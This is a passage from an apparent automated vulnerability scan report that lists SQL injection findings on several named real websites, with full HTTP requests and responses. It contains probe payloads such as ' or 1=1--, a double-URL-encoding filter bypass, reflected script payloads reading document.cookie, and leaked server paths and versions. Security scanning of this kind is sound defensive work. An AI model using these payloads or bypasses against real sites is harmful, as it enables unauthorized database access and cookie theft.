Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:25 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.109. http://www.caribbean-ocean.com/luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.110. http://www.caribbean-ocean.com/luxury%20Tobago%20Resort%20holidays/104 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Tobago%20Resort%20holidays/104

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Tobago%20Resort%20holidays/104' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.111. http://www.caribbean-ocean.com/luxury%20US%20Virgin%20Islands%20Resort%20holidays/288 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20US%20Virgin%20Islands%20Resort%20holidays/288

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20US%20Virgin%20Islands%20Resort%20holidays/288' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...
1.112. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:35 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=3ce2b08f2af5bcd9f92a4c82f8ffa1af; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 91977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<a href="http://www.cmswire.com/cms/enterprise-20/enterprise-20-rollup-learning-valuable-lessons-from-failure-010647.php"
               rel="permalink"
               title="Enterprise 2.0 Roll-up: Learning Valuable Lessons from Failure">
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:35 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=e3241157f39263515fa46115c31bb374; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:35 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
1.113. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364?1%2527=1 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=debaeaa17c120ccd13dcbdbf50682297; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 91977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<a href="http://www.cmswire.com/cms/enterprise-20/enterprise-20-rollup-learning-valuable-lessons-from-failure-010647.php"
               rel="permalink"
               title="Enterprise 2.0 Roll-up: Learning Valuable Lessons from Failure">
...[SNIP]...

Request 2

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364?1%2527%2527=1 HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:39:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=ef1aeb9b4ec92a7d986f53c38dd976a7; path=/
Cache-Control: max-age=1200
Expires: Fri, 25 Mar 2011 17:59:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
1.114. http://www.forex-direkt.de/ [b35b2--%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.forex-direkt.de
Path:   /

Issue detail

The b35b2--%3E%3Cscript%3Ealert(document.cookie parameter appears to be vulnerable to SQL injection attacks. The payloads 14649737'%20or%201%3d1--%20 and 14649737'%20or%201%3d2--%20 were each submitted in the b35b2--%3E%3Cscript%3Ealert(document.cookie parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?b35b2--%3E%3Cscript%3Ealert(document.cookie14649737'%20or%201%3d1--%20 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Fri, 18 Mar 2011 16:05:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Sat, 17-Mar-2012 16:05:22 GMT; path=/
Set-Cookie: WPS_date=20110318; expires=Sat, 19-Mar-2011 16:05:22 GMT
Set-Cookie: WPS_display_count=0; expires=Sat, 19-Mar-2011 16:05:22 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Online Forex Trading Community</title>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.forex-direkt.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.forex-direkt.de/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Forex Direkt' href='http://www.forex-direkt.de/' />
<meta name="generator" content="WordPress 3.0.3" />

<!-- All in One SEO Pack 1.6.12.2 by Michael Torbert of Semper Fi Web Design[306,327] -->
<meta name="description" content="Online Forex Trading Community - hier lernen Sie Forex traden und erfahren Sie alles ..ber den Devisenhandel und FX Trading." />
<meta name="keywords" content="Forex, Online Forex, Forex Trading, traden, FX Trading, Devisenhandel" />
<!-- /all in one seo pack -->
<script language="JavaScript" type="text/javascript" src="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-edition/description_selection.js"></script><link rel="stylesheet" type="text/css" media="screen" href="http://www.forex-direkt.de/wp-content/plugins/sociable-
...[SNIP]...

Request 2

GET /?b35b2--%3E%3Cscript%3Ealert(document.cookie14649737'%20or%201%3d2--%20 HTTP/1.1
Host: www.forex-direkt.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:05:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.12
X-Pingback: http://www.forex-direkt.de/xmlrpc.php
Set-Cookie: WPS_return_count=1; expires=Sat, 17-Mar-2012 16:05:24 GMT; path=/
Set-Cookie: WPS_date=20110318; expires=Sat, 19-Mar-2011 16:05:24 GMT
Set-Cookie: WPS_display_count=0; expires=Sat, 19-Mar-2011 16:05:24 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Online Forex Trading Community</title>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.forex-direkt.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.forex-direkt.de/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Forex Direkt' href='http://www.forex-direkt.de/' />
<meta name="generator" content="WordPress 3.0.3" />

<!-- All in One SEO Pack 1.6.12.2 by Michael Torbert of Semper Fi Web Design[306,327] -->
<meta name="description" content="Online Forex Trading Community - hier lernen Sie Forex traden und erfahren Sie alles ..ber den Devisenhandel und FX Trading." />
<meta name="keywords" content="Forex, Online Forex, Forex Trading, traden, FX Trading, Devisenhandel" />
<!-- /all in one seo pack -->
<script language="JavaScript" type="text/javascript" src="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-edition/description_selection.js"></script><link rel="stylesheet" type="text/css" media="screen" href="http://www.forex-direkt.de/wp-content/plugins/sociable-zyblog-
...[SNIP]...
1.115. http://www.gamespy.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.gamespy.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /?c6f81%22-alert(document.cookie HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Fri, 18 Mar 2011 16:06:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 18 Mar 2011 16:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c04-32473-437051038-2;Path=/;Domain=.gamespy.com;Expires=Sat, 14-Sep-30 16:06:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1300464390433v-1n-22mc+1300464390433mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com
Content-Length: 92161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>GameSpy: Video Game
...[SNIP]...
<a href="http://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=141877&eid=1439009&file=http://cdn.eyewonder.com/100125/768609/1439009/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://clk.redcated/ULA/go/303391665/direct/01/" target="_blank">
...[SNIP]...

Request 2

GET /?c6f81%22-alert(document.cookie HTTP/1.1
Host: www.gamespy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Fri, 18 Mar 2011 16:06:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 18 Mar 2011 16:06:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.gamespy.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: NGUserID=a016c07-6735-382974512-3;Path=/;Domain=.gamespy.com;Expires=Sat, 14-Sep-30 16:06:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.gamespy.com
Set-Cookie: freq=c-1300464391744v-1n-22mc+1300464391744mv+1mn+22wwe~0;Path=/;Domain=.gamespy.com
Content-Length: 90682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>GameSpy: Video Game
...[SNIP]...
1.116. http://www.hameaualbert.fr/misc/drupal.js1ca13">  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hameaualbert.fr
Path:   /misc/drupal.js1ca13"><img%20src=a%20onerror=alert(document.cookie

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /misc/drupal.js1ca13"><img%20src'=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=12f8218639673f8660ae007613072ebc; expires=Sun, 10-Apr-2011 19:42:32 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:12 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
<div class="messages error">
user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;onerror=alert(document.cookie&#039;&#039; at line 1
query: SELECT idrub FROM alias_photos WHERE p
...[SNIP]...

Request 2

GET /misc/drupal.js1ca13"><img%20src''=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=eaff2d9aa7ad2940d82ade23c2162d83; expires=Sun, 10-Apr-2011 19:42:33 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:13 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8292

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
1.117. http://www.hameaualbert.fr/misc/drupal.js1ca13">0bfdceb7ad4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hameaualbert.fr
Path:   /misc/drupal.js1ca13"><img%20src=a%20onerror=alert(document.cookie)>0bfdceb7ad4

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /misc/drupal.js1ca13"><img%20src'=a%20onerror=alert(document.cookie)>0bfdceb7ad4 HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=7f5f46a449fe60562cadfd2050470483; expires=Sun, 10-Apr-2011 19:42:35 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:15 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
<div class="messages error">
user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;onerror=alert(document.cookie)&gt;0bfdceb7ad4&#039;&#039; at line 1
query: SELECT idrub FROM alia
...[SNIP]...

Request 2

GET /misc/drupal.js1ca13"><img%20src''=a%20onerror=alert(document.cookie)>0bfdceb7ad4 HTTP/1.1
Host: www.hameaualbert.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 18 Mar 2011 16:09:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl0-gentoo
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS78152948f1a59c290023e5e0c8b013ae=b6a909cf0868800092ae9384c1d97f32; expires=Sun, 10-Apr-2011 19:42:36 GMT; path=/; domain=.hameaualbert.fr
Last-Modified: Fri, 18 Mar 2011 16:09:16 GMT
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8318

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-e
...[SNIP]...
1.118. http://www.intranetjournal.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 15:59:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:00:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 151225


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=792769967;u=j;z=20110318115937" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661094/661076/661075/581331/581034;s=9539;x=7936;f=792769967;u=j;z=20110318115937" alt="Click here"></a>
</noscript>
</span>
<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; 